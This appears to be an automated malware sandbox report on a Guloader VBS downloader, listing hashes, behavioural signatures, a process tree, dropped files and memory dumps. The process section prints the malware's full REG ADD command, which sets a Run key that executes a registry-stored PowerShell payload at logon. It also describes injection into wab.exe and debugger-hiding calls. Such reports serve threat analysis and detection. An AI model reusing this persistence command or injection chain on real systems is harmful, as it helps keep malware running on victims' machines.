Analysis
max time kernel: 121s
max time network: 122s
platform: windows7_x64
resource: win7-20240215-en
resource tags: arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
submitted: 19-04-2024 01:16
Static task: static1
Behavioral task: behavioral1
  Sample: 418c376ea99f08d252dc0ce3650056497a2e180a7fb52bdb4a1a1cb661ef013f.vbs
  Resource: win7-20240215-en
Behavioral task: behavioral2
  Sample: 418c376ea99f08d252dc0ce3650056497a2e180a7fb52bdb4a1a1cb661ef013f.vbs
  Resource: win10v2004-20240412-en
General
Target: 418c376ea99f08d252dc0ce3650056497a2e180a7fb52bdb4a1a1cb661ef013f.vbs
Size: 16KB
MD5: ba91098f69e003ca4d4d9c83fa6350d6
SHA1: 3553a1fe2fdbd2940a59ed20fb361781b6150abc
SHA256: 418c376ea99f08d252dc0ce3650056497a2e180a7fb52bdb4a1a1cb661ef013f
SHA512: ec1aeea69144e0a96e815855f61c1e9e15f5be27f4bc1d19b05b6849df65d4b971592af46d7c8b47e4c6eb589b92a5b8936c801c98c04992fec5a65d3fd3f06f
SSDEEP: 384:+uMcrrXFo5t8VvomRWq1hn+h/RW5MaMIN0Oq5u2:+tGov89lRW6hqZWqaLGv
Malware Config
Signatures
Guloader, Cloudeye
  A shellcode-based downloader first seen in 2020.
Blocklisted process makes network request (1 IoC)
  flow  pid   process
  4     764   powershell.exe

Adds Run key to start application (2 TTPs, 1 IoC)
  process: reg.exe
  description: Set value (str)
  ioc: \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\Fravrist = "%desforuden% -w 1 $Bortkaldte=(Get-ItemProperty -Path 'HKCU:\\Diancecht\\').Divisionstegnene;%desforuden% ($Bortkaldte)"

Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  pid   process
  1692  wab.exe
  1692  wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid   process
  2464  powershell.exe
  1692  wab.exe

Suspicious use of SetThreadContext (1 IoC)
  description                           pid   process         target process
  PID 2464 set thread context of 1692   2464  powershell.exe  wab.exe

Modifies registry key (1 TTP, 1 IoC)

Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid   process
  764   powershell.exe
  2464  powershell.exe
  2464  powershell.exe

Suspicious behavior: MapViewOfSection (1 IoC)
  pid   process
  2464  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   process
  Token: SeDebugPrivilege  764   powershell.exe
  Token: SeDebugPrivilege  2464  powershell.exe

Suspicious use of WriteProcessMemory (28 IoCs; identical entries collapsed into the count column)
  description                        pid   process         target process   count
  PID 2944 wrote to memory of 764    2944  WScript.exe     powershell.exe   3
  PID 764 wrote to memory of 2580    764   powershell.exe  cmd.exe          3
  PID 764 wrote to memory of 2464    764   powershell.exe  powershell.exe   4
  PID 2464 wrote to memory of 2716   2464  powershell.exe  cmd.exe          4
  PID 2464 wrote to memory of 1692   2464  powershell.exe  wab.exe          6
  PID 1692 wrote to memory of 2992   1692  wab.exe         cmd.exe          4
  PID 2992 wrote to memory of 2476   2992  cmd.exe         reg.exe          4
Processes (depth in the process tree given in brackets; PIDs taken from the signature tables above)

[depth 1] C:\Windows\System32\WScript.exe (pid 2944)
  command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\418c376ea99f08d252dc0ce3650056497a2e180a7fb52bdb4a1a1cb661ef013f.vbs"
  - Suspicious use of WriteProcessMemory
[depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (pid 764)
  command line: a single-argument obfuscated PowerShell script (the full obfuscated command line is omitted here)
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

[depth 3] C:\Windows\system32\cmd.exe (pid 2580)
  command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Jobmistress.Taw && echo $"
[depth 3] C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe (pid 2464)
  command line: the same obfuscated PowerShell script as the 64-bit powershell.exe instance, re-launched under SysWOW64 (the full obfuscated command line is omitted here)
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

[depth 4] C:\Windows\SysWOW64\cmd.exe (pid 2716)
  command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Jobmistress.Taw && echo $"

[depth 4] C:\Program Files (x86)\windows mail\wab.exe (pid 1692)
  command line: "C:\Program Files (x86)\windows mail\wab.exe"
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of WriteProcessMemory

[depth 5] C:\Windows\SysWOW64\cmd.exe (pid 2992)
  command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Fravrist" /t REG_EXPAND_SZ /d "%desforuden% -w 1 $Bortkaldte=(Get-ItemProperty -Path 'HKCU:\Diancecht\').Divisionstegnene;%desforuden% ($Bortkaldte)"
  - Suspicious use of WriteProcessMemory

[depth 6] C:\Windows\SysWOW64\reg.exe (pid 2476)
  command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Fravrist" /t REG_EXPAND_SZ /d "%desforuden% -w 1 $Bortkaldte=(Get-ItemProperty -Path 'HKCU:\Diancecht\').Divisionstegnene;%desforuden% ($Bortkaldte)"
  - Adds Run key to start application
  - Modifies registry key
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
C:\Users\Admin\AppData\Roaming\Jobmistress.Taw
  Filesize: 475KB
  MD5: 44da74895a8d07aacdd0c252f1b27dd8
  SHA1: 72ea60a757ce980b2de563caebdfbf9facd51835
  SHA256: b63ba6d7514534338dd6576f273a44cc84037bd57414fb952ff2ced5c82ab069
  SHA512: 528dc0ec8d400664e6c2f09e302cd9232886de7e838a3d64d327637ee5f052677ee8fecaa81f963c4f319121f7cf99c54b4017d8f9bb159a24218724af6a6786

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RMNS0L65OQJYTEAWP3RN.temp
  Filesize: 7KB
  MD5: fe64189f2598fc9f255b829187df46e8
  SHA1: 66c2f1c6a820a23eca9a1a82c8f293114dd0198e
  SHA256: 92d200fb30e44aea12f9561d40e8cbaecc745e7f8fbe9923b56ccee567b2e288
  SHA512: 5eafacdb9dbce17bea08fe12eab18e353b7e1521b22813eba300b5c96ef3860e6a2ccb1350622a6dcda5e1709dbdcda81500b112e20edfd4f601343cb6b50874
Memory dump (pid-index, address range)                                  Filesize
memory/764-22-0x0000000002830000-0x00000000028B0000-memory.dmp          512KB
memory/764-23-0x0000000002830000-0x00000000028B0000-memory.dmp          512KB
memory/764-8-0x0000000002830000-0x00000000028B0000-memory.dmp           512KB
memory/764-9-0x0000000002830000-0x00000000028B0000-memory.dmp           512KB
memory/764-10-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp          9.6MB
memory/764-6-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp           9.6MB
memory/764-39-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp          9.6MB
memory/764-25-0x0000000002830000-0x00000000028B0000-memory.dmp          512KB
memory/764-24-0x0000000002830000-0x00000000028B0000-memory.dmp          512KB
memory/764-7-0x0000000002830000-0x00000000028B0000-memory.dmp           512KB
memory/764-5-0x00000000022D0000-0x00000000022D8000-memory.dmp           32KB
memory/764-20-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp          9.6MB
memory/764-4-0x000000001B770000-0x000000001BA52000-memory.dmp           2.9MB
memory/1692-34-0x0000000077A90000-0x0000000077B66000-memory.dmp         856KB
memory/1692-32-0x00000000778A0000-0x0000000077A49000-memory.dmp         1.7MB
memory/1692-37-0x0000000077A90000-0x0000000077B66000-memory.dmp         856KB
memory/1692-36-0x0000000001400000-0x0000000005D9E000-memory.dmp         73.6MB
memory/1692-33-0x0000000077AC6000-0x0000000077AC7000-memory.dmp         4KB
memory/2464-21-0x0000000002BC0000-0x0000000002C00000-memory.dmp         256KB
memory/2464-28-0x0000000073740000-0x0000000073CEB000-memory.dmp         5.7MB
memory/2464-29-0x0000000002BC0000-0x0000000002C00000-memory.dmp         256KB
memory/2464-30-0x00000000778A0000-0x0000000077A49000-memory.dmp         1.7MB
memory/2464-31-0x0000000077A90000-0x0000000077B66000-memory.dmp         856KB
memory/2464-26-0x0000000006600000-0x000000000AF9E000-memory.dmp         73.6MB
memory/2464-27-0x0000000004DD0000-0x0000000004DD1000-memory.dmp         4KB
memory/2464-18-0x0000000002BC0000-0x0000000002C00000-memory.dmp         256KB
memory/2464-16-0x0000000002BC0000-0x0000000002C00000-memory.dmp         256KB
memory/2464-17-0x0000000073740000-0x0000000073CEB000-memory.dmp         5.7MB
memory/2464-15-0x0000000073740000-0x0000000073CEB000-memory.dmp         5.7MB